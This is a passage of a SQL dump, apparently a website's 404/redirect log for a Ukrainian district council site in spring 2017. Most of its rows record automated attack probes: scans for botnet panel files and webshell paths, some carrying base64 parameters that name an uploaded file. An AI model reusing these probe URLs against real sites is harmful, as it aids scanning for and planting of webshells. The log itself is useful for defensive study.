00:00:00',301),(29815,'http://www.malyn-rayrada.gov.ua/index.php/includes/send_command.php',NULL,'','',6,0,'2017-03-26 11:14:49','0000-00-00 00:00:00',301),(29816,'http://www.malyn-rayrada.gov.ua/index.php/theme/images/back-all.png',NULL,'','',6,0,'2017-03-26 11:14:49','0000-00-00 00:00:00',301),(29817,'http://www.malyn-rayrada.gov.ua/post/echo',NULL,'','',9,0,'2017-03-26 11:14:52','0000-00-00 00:00:00',301),(29818,'http://www.malyn-rayrada.gov.ua/index.php/fre.php',NULL,'','',7,0,'2017-03-26 11:14:52','0000-00-00 00:00:00',301),(29819,'http://www.malyn-rayrada.gov.ua/index.php/adsfdsafas.php',NULL,'','',7,0,'2017-03-26 11:14:52','0000-00-00 00:00:00',301),(29820,'http://www.malyn-rayrada.gov.ua/path/index.php',NULL,'','',9,0,'2017-03-26 11:14:54','0000-00-00 00:00:00',301),(29821,'http://www.malyn-rayrada.gov.ua/index.php/css',NULL,'','',39,0,'2017-03-26 11:14:54','0000-00-00 00:00:00',301),(29822,'http://www.malyn-rayrada.gov.ua/index.php/files',NULL,'','',32,0,'2017-03-26 11:14:55','0000-00-00 00:00:00',301),(29823,'http://www.malyn-rayrada.gov.ua/index.php/img/back',NULL,'','',26,0,'2017-03-26 11:14:55','0000-00-00 00:00:00',301),(29824,'http://www.malyn-rayrada.gov.ua/index.php/img/flags',NULL,'','',32,0,'2017-03-26 11:14:55','0000-00-00 00:00:00',301),(29825,'http://www.malyn-rayrada.gov.ua/index.php/img/softs',NULL,'','',32,0,'2017-03-26 11:14:55','0000-00-00 00:00:00',301),(29826,'http://www.malyn-rayrada.gov.ua/index.php/img/back/hawk-clip-art-HAWK03.gif',NULL,'','',26,0,'2017-03-26 11:14:57','0000-00-00 00:00:00',301),(29827,'http://www.malyn-rayrada.gov.ua/index.php/ img/back',NULL,'','',6,0,'2017-03-26 11:14:59','0000-00-00 00:00:00',301),(29828,'http://www.malyn-rayrada.gov.ua/index.php/admin/resources/images/',NULL,'','',14,0,'2017-03-26 11:15:04','0000-00-00 00:00:00',301),(29829,'http://www.malyn-rayrada.gov.ua/index.php/admin/resources/css/',NULL,'','',14,0,'2017-03-26 11:15:04','0000-00-00 00:00:00',301),(29830,'http://www.malyn-rayrada.gov.ua/index.php/admin/flags/',NULL,'','',14,0,'2017-03-26 11:15:04','0000-00-00 00:00:00',301),(29831,'http://www.malyn-rayrada.gov.ua/index.php/admin/images/',NULL,'','',14,0,'2017-03-26 11:15:05','0000-00-00 00:00:00',301),(29832,'http://www.malyn-rayrada.gov.ua/index.php/admin/resources/images/black/button/btn-arrow.gif',NULL,'','',6,0,'2017-03-26 11:15:06','0000-00-00 00:00:00',301),(29833,'http://www.malyn-rayrada.gov.ua/index.php/admin/resources/images/black/menu/menu.gif',NULL,'','',6,0,'2017-03-26 11:15:06','0000-00-00 00:00:00',301),(29834,'http://www.malyn-rayrada.gov.ua/index.php/admin/resources/images/default/button/btn-arrow.gif',NULL,'','',6,0,'2017-03-26 11:15:06','0000-00-00 00:00:00',301),(29835,'http://www.malyn-rayrada.gov.ua/index.php/admin/resources/images/default/menu/menu.gif',NULL,'','',6,0,'2017-03-26 11:15:06','0000-00-00 00:00:00',301),(29836,'http://www.malyn-rayrada.gov.ua/index.php/admin/images/save.png',NULL,'','',6,0,'2017-03-26 11:15:06','0000-00-00 00:00:00',301),(29837,'http://www.malyn-rayrada.gov.ua/index.php/admin/images/add.png',NULL,'','',6,0,'2017-03-26 11:15:06','0000-00-00 00:00:00',301),(29838,'http://www.malyn-rayrada.gov.ua/index.php/login/index.php',NULL,'','',13,0,'2017-03-26 11:15:07','0000-00-00 00:00:00',301),(29839,'http://www.malyn-rayrada.gov.ua/index.php/include/',NULL,'','',6,0,'2017-03-26 11:15:07','0000-00-00 00:00:00',301),(29840,'http://www.malyn-rayrada.gov.ua/index.php/js/main.js',NULL,'','',6,0,'2017-03-26 11:15:07','0000-00-00 00:00:00',301),(29841,'http://www.malyn-rayrada.gov.ua/index.php/asfdasfasdfasdf.php',NULL,'','',7,0,'2017-03-26 11:15:08','0000-00-00 00:00:00',301),(29842,'http://www.malyn-rayrada.gov.ua/index.php/configuration.php',NULL,'','',8,0,'2017-03-26 11:15:08','0000-00-00 00:00:00',301),(29843,'http://www.malyn-rayrada.gov.ua/index.php/page.php',NULL,'','',7,0,'2017-03-26 11:15:08','0000-00-00 00:00:00',301),(29844,'http://www.malyn-rayrada.gov.ua/index.php/CONFIGURATION.php',NULL,'','',6,0,'2017-03-26 11:15:08','0000-00-00 00:00:00',301),(29845,'http://www.malyn-rayrada.gov.ua/index.php/include/inc_botlist.php',NULL,'','',7,0,'2017-03-26 11:15:09','0000-00-00 00:00:00',301),(29846,'http://www.malyn-rayrada.gov.ua/index.php/include/inc_commands.php',NULL,'','',7,0,'2017-03-26 11:15:09','0000-00-00 00:00:00',301),(29847,'http://www.malyn-rayrada.gov.ua/index.php/include/tpl_commands-php',NULL,'','',7,0,'2017-03-26 11:15:09','0000-00-00 00:00:00',301),(29848,'http://www.malyn-rayrada.gov.ua/index.php/include/tpl_main.php',NULL,'','',7,0,'2017-03-26 11:15:09','0000-00-00 00:00:00',301),(29849,'http://www.malyn-rayrada.gov.ua/index.php/securimage/backgrounds',NULL,'','',7,0,'2017-03-26 11:15:09','0000-00-00 00:00:00',301),(29850,'http://www.malyn-rayrada.gov.ua/index.php/styles/main.css',NULL,'','',7,0,'2017-03-26 11:15:09','0000-00-00 00:00:00',301),(29851,'http://www.malyn-rayrada.gov.ua/index.php/styles/reset.css',NULL,'','',7,0,'2017-03-26 11:15:10','0000-00-00 00:00:00',301),(29852,'http://www.malyn-rayrada.gov.ua/index.php/images/favicon.ico',NULL,'','',7,0,'2017-03-26 11:15:10','0000-00-00 00:00:00',301),(29853,'http://www.malyn-rayrada.gov.ua/index.php/gate.php?request=true',NULL,'','',1,0,'2017-03-26 11:15:10','0000-00-00 00:00:00',301),(29854,'http://www.malyn-rayrada.gov.ua/pages/bots.php',NULL,'','',7,0,'2017-03-26 11:15:11','0000-00-00 00:00:00',301),(29855,'http://www.malyn-rayrada.gov.ua/pages/edituser.php',NULL,'','',7,0,'2017-03-26 11:15:12','0000-00-00 00:00:00',301),(29856,'http://www.malyn-rayrada.gov.ua/pages/main.php',NULL,'','',7,0,'2017-03-26 11:15:12','0000-00-00 00:00:00',301),(29857,'http://www.malyn-rayrada.gov.ua/pages/tasks.php',NULL,'','',7,0,'2017-03-26 11:15:13','0000-00-00 00:00:00',301),(29858,'http://www.malyn-rayrada.gov.ua/pages/users.php',NULL,'','',7,0,'2017-03-26 11:15:13','0000-00-00 00:00:00',301),(29859,'http://www.malyn-rayrada.gov.ua/pages/logs.php',NULL,'','',7,0,'2017-03-26 11:15:13','0000-00-00 00:00:00',301),(29860,'http://www.malyn-rayrada.gov.ua/pages/account.php',NULL,'','',7,0,'2017-03-26 11:15:14','0000-00-00 00:00:00',301),(29861,'http://www.malyn-rayrada.gov.ua/pages/settings.php',NULL,'','',5,0,'2017-03-26 11:15:14','0000-00-00 00:00:00',301),(29862,'http://www.malyn-rayrada.gov.ua/pages/details.php',NULL,'','',5,0,'2017-03-26 11:15:14','0000-00-00 00:00:00',301),(29863,'http://www.malyn-rayrada.gov.ua/pages/logout.php',NULL,'','',5,0,'2017-03-26 11:15:14','0000-00-00 00:00:00',301),(29864,'http://www.malyn-rayrada.gov.ua/pages/help.php',NULL,'','',5,0,'2017-03-26 11:15:15','0000-00-00 00:00:00',301),(29865,'http://www.malyn-rayrada.gov.ua/index.php/api.php',NULL,'','',6,0,'2017-03-26 11:15:16','0000-00-00 00:00:00',301),(29866,'http://www.malyn-rayrada.gov.ua/index.php/data/login.css',NULL,'','',6,0,'2017-03-26 11:15:16','0000-00-00 00:00:00',301),(29867,'http://www.malyn-rayrada.gov.ua/index.php/gate.php',NULL,'','',20,0,'2017-03-26 11:15:16','0000-00-00 00:00:00',301),(29868,'http://www.malyn-rayrada.gov.ua/index.php/img',NULL,'','',21,0,'2017-03-26 11:15:16','0000-00-00 00:00:00',301),(29869,'http://www.malyn-rayrada.gov.ua/index.php/includes',NULL,'','',7,0,'2017-03-26 11:15:17','0000-00-00 00:00:00',301),(29870,'http://www.malyn-rayrada.gov.ua/index.php/includes/',NULL,'','',7,0,'2017-03-26 11:15:17','0000-00-00 00:00:00',301),(29871,'http://www.malyn-rayrada.gov.ua/index.php/statistics.php/',NULL,'','',7,0,'2017-03-26 11:15:17','0000-00-00 00:00:00',301),(29872,'http://www.malyn-rayrada.gov.ua/index.php/includes/database.php',NULL,'','',7,0,'2017-03-26 11:15:17','0000-00-00 00:00:00',301),(29873,'http://www.malyn-rayrada.gov.ua/index.php/includes/database.php/',NULL,'','',7,0,'2017-03-26 11:15:17','0000-00-00 00:00:00',301),(29874,'http://www.malyn-rayrada.gov.ua/index.php/gate.php/',NULL,'','',7,0,'2017-03-26 11:15:18','0000-00-00 00:00:00',301),(29875,'http://www.malyn-rayrada.gov.ua/index.php/includes/commands.php',NULL,'','',7,0,'2017-03-26 11:15:18','0000-00-00 00:00:00',301),(29876,'http://www.malyn-rayrada.gov.ua/index.php/includes/commands.php/',NULL,'','',7,0,'2017-03-26 11:15:18','0000-00-00 00:00:00',301),(29877,'http://www.malyn-rayrada.gov.ua/index.php/css/table_view.css',NULL,'','',6,0,'2017-03-26 11:15:18','0000-00-00 00:00:00',301),(29878,'http://www.malyn-rayrada.gov.ua/index.php/android/admin.php',NULL,'','',7,0,'2017-03-26 11:15:20','0000-00-00 00:00:00',301),(29879,'http://www.malyn-rayrada.gov.ua/index.php/ufr.php',NULL,'','',5,0,'2017-03-26 11:15:21','0000-00-00 00:00:00',301),(29880,'http://www.malyn-rayrada.gov.ua/index.php/img/banners',NULL,'','',14,0,'2017-03-26 11:15:24','0000-00-00 00:00:00',301),(29881,'http://www.malyn-rayrada.gov.ua/index.php/afdsafsdaf.php',NULL,'','',7,0,'2017-03-26 11:15:26','0000-00-00 00:00:00',301),(29882,'http://www.malyn-rayrada.gov.ua/index.php/style_light.css',NULL,'','',7,0,'2017-03-26 11:15:27','0000-00-00 00:00:00',301),(29883,'http://www.malyn-rayrada.gov.ua/index.php/21421asdfdsf.php',NULL,'','',6,0,'2017-03-26 11:15:30','0000-00-00 00:00:00',301),(29884,'http://www.malyn-rayrada.gov.ua/index.php/webcams.php',NULL,'','',6,0,'2017-03-26 11:15:30','0000-00-00 00:00:00',301),(29885,'http://www.malyn-rayrada.gov.ua/index.php/deleteall.php',NULL,'','',6,0,'2017-03-26 11:15:31','0000-00-00 00:00:00',301),(29886,'http://www.malyn-rayrada.gov.ua/index.php/delete.php',NULL,'','',6,0,'2017-03-26 11:15:31','0000-00-00 00:00:00',301),(29887,'http://www.malyn-rayrada.gov.ua/index.php/passwords.php',NULL,'','',6,0,'2017-03-26 11:15:31','0000-00-00 00:00:00',301),(29888,'http://www.malyn-rayrada.gov.ua/index.php/keystrokes.php',NULL,'','',6,0,'2017-03-26 11:15:31','0000-00-00 00:00:00',301),(29889,'http://www.malyn-rayrada.gov.ua/index.php/post.php',NULL,'','',9,0,'2017-03-26 11:15:33','0000-00-00 00:00:00',301),(29890,'http://www.malyn-rayrada.gov.ua/index.php/create.php',NULL,'','',6,0,'2017-03-26 11:15:33','0000-00-00 00:00:00',301),(29891,'http://www.malyn-rayrada.gov.ua/index.php/language.php',NULL,'','',6,0,'2017-03-26 11:15:33','0000-00-00 00:00:00',301),(29892,'http://www.malyn-rayrada.gov.ua/index.php/1681-vitaemo-iz-8-bereznya',NULL,'','',38,0,'2017-03-27 02:06:51','0000-00-00 00:00:00',301),(29893,'http://www.malyn-rayrada.gov.ua/images/1ndex.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:04:36','0000-00-00 00:00:00',301),(29894,'http://www.malyn-rayrada.gov.ua/sqlbak.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:05:02','0000-00-00 00:00:00',301),(29895,'http://www.malyn-rayrada.gov.ua/email.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:05:45','0000-00-00 00:00:00',301),(29896,'http://www.malyn-rayrada.gov.ua/functions.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:08:07','0000-00-00 00:00:00',301),(29897,'http://www.malyn-rayrada.gov.ua/cache/news.php?z3=bHhpdGVULnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:09:01','0000-00-00 00:00:00',301),(29898,'http://www.malyn-rayrada.gov.ua/tmp.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',4,0,'2017-03-28 23:09:21','0000-00-00 00:00:00',301),(29899,'http://www.malyn-rayrada.gov.ua/shootme.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:09:38','0000-00-00 00:00:00',301),(29900,'http://www.malyn-rayrada.gov.ua/robots.txt.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:10:12','0000-00-00 00:00:00',301),(29901,'http://www.malyn-rayrada.gov.ua/jconfig.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:10:32','0000-00-00 00:00:00',301),(29902,'http://www.malyn-rayrada.gov.ua/media/reads.php?z3=bHhpdGVULnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:10:47','0000-00-00 00:00:00',301),(29903,'http://www.malyn-rayrada.gov.ua/media/1ndex.php?z3=bHhpdGVULnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:11:09','0000-00-00 00:00:00',301),(29904,'http://www.malyn-rayrada.gov.ua/sql_dump.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:11:40','0000-00-00 00:00:00',301),(29905,'http://www.malyn-rayrada.gov.ua/images/laj.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:11:48','0000-00-00 00:00:00',301),(29906,'http://www.malyn-rayrada.gov.ua/media/404.php?z3=bHhpdGVULnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:12:10','0000-00-00 00:00:00',301),(29907,'http://www.malyn-rayrada.gov.ua/media/tmp.php?z3=bHhpdGVULnBocA==&z4=L21lZGlhLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:12:24','0000-00-00 00:00:00',301),(29908,'http://www.malyn-rayrada.gov.ua/r3x.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:12:37','0000-00-00 00:00:00',301),(29909,'http://www.malyn-rayrada.gov.ua/images/stories/0day.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy9zdG9yaWVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:13:29','0000-00-00 00:00:00',301),(29910,'http://www.malyn-rayrada.gov.ua/includes/u2p.php?z3=bHhpdGVULnBocA==&z4=L2luY2x1ZGVzLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:13:37','0000-00-00 00:00:00',301),(29911,'http://www.malyn-rayrada.gov.ua/images/xxx.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:14:02','0000-00-00 00:00:00',301),(29912,'http://www.malyn-rayrada.gov.ua/al277.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:14:21','0000-00-00 00:00:00',301),(29913,'http://www.malyn-rayrada.gov.ua/cache/cache_aqbmkwwx.php?z3=bHhpdGVULnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:14:34','0000-00-00 00:00:00',301),(29914,'http://www.malyn-rayrada.gov.ua/install.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:14:57','0000-00-00 00:00:00',301),(29915,'http://www.malyn-rayrada.gov.ua/dswat.org/wsdl.php?z3=bHhpdGVULnBocA==&z4=L2Rzd2F0Lm9yZy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:15:13','0000-00-00 00:00:00',301),(29916,'http://www.malyn-rayrada.gov.ua/robot.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:15:35','0000-00-00 00:00:00',301),(29917,'http://www.malyn-rayrada.gov.ua/wsdl.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:15:59','0000-00-00 00:00:00',301),(29918,'http://www.malyn-rayrada.gov.ua/site/tmp/cTivrC.php?z3=bHhpdGVULnBocA==&z4=L3NpdGUvdG1wLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:16:42','0000-00-00 00:00:00',301),(29919,'http://www.malyn-rayrada.gov.ua/wp-main.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:17:14','0000-00-00 00:00:00',301),(29920,'http://www.malyn-rayrada.gov.ua/images/al277.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:18:00','0000-00-00 00:00:00',301),(29921,'http://www.malyn-rayrada.gov.ua/webconfig.txt.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:18:09','0000-00-00 00:00:00',301),(29922,'http://www.malyn-rayrada.gov.ua/thumb.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:18:53','0000-00-00 00:00:00',301),(29923,'http://www.malyn-rayrada.gov.ua/SessionController.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:19:32','0000-00-00 00:00:00',301),(29924,'http://www.malyn-rayrada.gov.ua/maill.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:19:58','0000-00-00 00:00:00',301),(29925,'http://www.malyn-rayrada.gov.ua/error-log.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:20:22','0000-00-00 00:00:00',301),(29926,'http://www.malyn-rayrada.gov.ua/authenticating.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:20:50','0000-00-00 00:00:00',301),(29927,'http://www.malyn-rayrada.gov.ua/images/google-assist.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:21:32','0000-00-00 00:00:00',301),(29928,'http://www.malyn-rayrada.gov.ua/images/robots.txt.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:22:04','0000-00-00 00:00:00',301),(29929,'http://www.malyn-rayrada.gov.ua/elements.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:22:12','0000-00-00 00:00:00',301),(29930,'http://www.malyn-rayrada.gov.ua/xmlsrpc.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:22:29','0000-00-00 00:00:00',301),(29931,'http://www.malyn-rayrada.gov.ua/wp-cache.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:22:46','0000-00-00 00:00:00',301),(29932,'http://www.malyn-rayrada.gov.ua/images/404.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:23:00','0000-00-00 00:00:00',301),(29933,'http://www.malyn-rayrada.gov.ua/images/head.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:23:10','0000-00-00 00:00:00',301),(29934,'http://www.malyn-rayrada.gov.ua/cache/support.php?z3=bHhpdGVULnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:23:22','0000-00-00 00:00:00',301),(29935,'http://www.malyn-rayrada.gov.ua/RoseLeif.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:23:29','0000-00-00 00:00:00',301),(29936,'http://www.malyn-rayrada.gov.ua/Abbrevsprl.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:23:40','0000-00-00 00:00:00',301),(29937,'http://www.malyn-rayrada.gov.ua/show.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:23:51','0000-00-00 00:00:00',301),(29938,'http://www.malyn-rayrada.gov.ua/images/defau1t.php?z3=bHhpdGVULnBocA==&z4=L2ltYWdlcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:24:07','0000-00-00 00:00:00',301),(29939,'http://www.malyn-rayrada.gov.ua/cli/40dd1d.php?z3=bHhpdGVULnBocA==&z4=L2NsaS8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:24:18','0000-00-00 00:00:00',301),(29940,'http://www.malyn-rayrada.gov.ua/infos.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:24:42','0000-00-00 00:00:00',301),(29941,'http://www.malyn-rayrada.gov.ua/cache/defau1t.php?z3=bHhpdGVULnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:24:50','0000-00-00 00:00:00',301),(29942,'http://www.malyn-rayrada.gov.ua/bookmark.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:24:57','0000-00-00 00:00:00',301),(29943,'http://www.malyn-rayrada.gov.ua/configbak.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:25:09','0000-00-00 00:00:00',301),(29944,'http://www.malyn-rayrada.gov.ua/wp-data.php?z3=bHhpdGVULnBocA==&z4=Lw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:25:43','0000-00-00 00:00:00',301),(29945,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Fbrrchive.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:26:13','0000-00-00 00:00:00',301),(29946,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/Fbrrchive.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvdXBsb2Fkcy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:26:29','0000-00-00 00:00:00',301),(29947,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/myshe.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:26:49','0000-00-00 00:00:00',301),(29948,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-cache.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:26:58','0000-00-00 00:00:00',301),(29949,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wp-footers.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:27:13','0000-00-00 00:00:00',301),(29950,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/wpfootes.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:27:28','0000-00-00 00:00:00',301),(29951,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/sql_dump.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:27:37','0000-00-00 00:00:00',301),(29952,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIontrol.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:27:44','0000-00-00 00:00:00',301),(29953,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/SocketIasrgasfontrol.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:28:04','0000-00-00 00:00:00',301),(29954,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/Analyser.php?z3=bHhpdGVULnBocA==&z4=L3dwLWNvbnRlbnQvcGx1Z2lucy8=',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:28:28','0000-00-00 00:00:00',301),(29955,'http://www.malyn-rayrada.gov.ua/cache/list.php?z3=bHhpdGVULnBocA==&z4=L2NhY2hlLw==',NULL,'www.malyn-rayrada.gov.ua','',2,0,'2017-03-28 23:28:38','0000-00-00 00:00:00',301),(29956,'http://www.malyn-rayrada.gov.ua/modules/mod_simplefileuploadv1.3/elements/lxiteT.php',NULL,'','',1,0,'2017-03-28 23:33:50','0000-00-00 00:00:00',301),(29957,'http://www.malyn-rayrada.gov.ua/wp-content/plugins/revslider/temp/update_extract/lxiteT.php',NULL,'','',1,0,'2017-03-28 23:34:07','0000-00-00 00:00:00',301),(29958,'http://www.malyn-rayrada.gov.ua/wp-content/uploads/lxiteT.php',NULL,'','',1,0,'2017-03-28 23:35:13','0000-00-00 00:00:00',301),(29959,'http://www.malyn-rayrada.gov.ua/lxiteT.php',NULL,'','',1,0,'2017-03-28 23:35:26','0000-00-00 00:00:00',301),(29960,'http://www.malyn-rayrada.gov.ua/sites/all/libraries/elfinder/files/lxiteT.php',NULL,'','',1,0,'2017-03-28 23:35:30','0000-00-00 00:00:00',301),(29961,'http://www.malyn-rayrada.gov.ua/xmlrpc/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/xmlrpc/logo_img.php','',1,0,'2017-03-30 15:40:44','0000-00-00 00:00:00',301),(29962,'http://www.malyn-rayrada.gov.ua/cli/logo_img.php',NULL,'http://www.malyn-rayrada.gov.ua/cli/logo_img.php','',2,0,'2017-03-30 16:39:27','0000-00-00 00:00:00',301),(29963,'http://www.malyn-rayrada.gov.ua/attachments/article/1691/Ð¿Ñ–Ð´Ñ ÑƒÐ¼ÐºÐ¸ відкритого Ð³Ð¾Ð»Ð¾Ñ ÑƒÐ²Ð°Ð½Ð½Ñ 1.pdf',NULL,'','',2,0,'2017-03-30 18:16:04','0000-00-00 00:00:00',301),(29964,'http://malyn-rayrada.gov.ua/xmlrpc/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/xmlrpc/logo_img.php','',1,0,'2017-03-31 02:09:24','0000-00-00 00:00:00',301),(29965,'http://malyn-rayrada.gov.ua/cli/logo_img.php',NULL,'http://malyn-rayrada.gov.ua/cli/logo_img.php','',1,0,'2017-03-31 02:59:53','0000-00-00 00:00:00',301),(29966,'http://malyn-rayrada.gov.ua/index.php?option=com_easyblog&view=dashboard&layout=write',NULL,'http://malyn-rayrada.gov.ua/','',12,0,'2017-03-31 09:53:35','0000-00-00 00:00:00',301),(29967,'http://www.malyn-rayrada.gov.ua/attachments/article/1702/результати 22032017.pdf',NULL,'','',2,0,'2017-03-31 17:22:03','0000-00-00 00:00:00',301),(29968,'http://www.malyn-rayrada.gov.ua/modx.php',NULL,'http://www.malyn-rayrada.gov.ua/modx.php','',1,0,'2017-04-01 04:11:01','0000-00-00 00:00:00',301),(29969,'http://www.malyn-rayrada.gov.ua/index.php/1693-pro-sklikannya-16-pozachergovoji-sesiji-rajonnoji-radi-7-sklikannya',NULL,'','',29,0,'2017-04-01 08:50:33','0000-00-00 00:00:00',301),(29970,'http://malyn-rayrada.gov.ua/modx.php',NULL,'http://malyn-rayrada.gov.ua/modx.php','',4,0,'2017-04-01 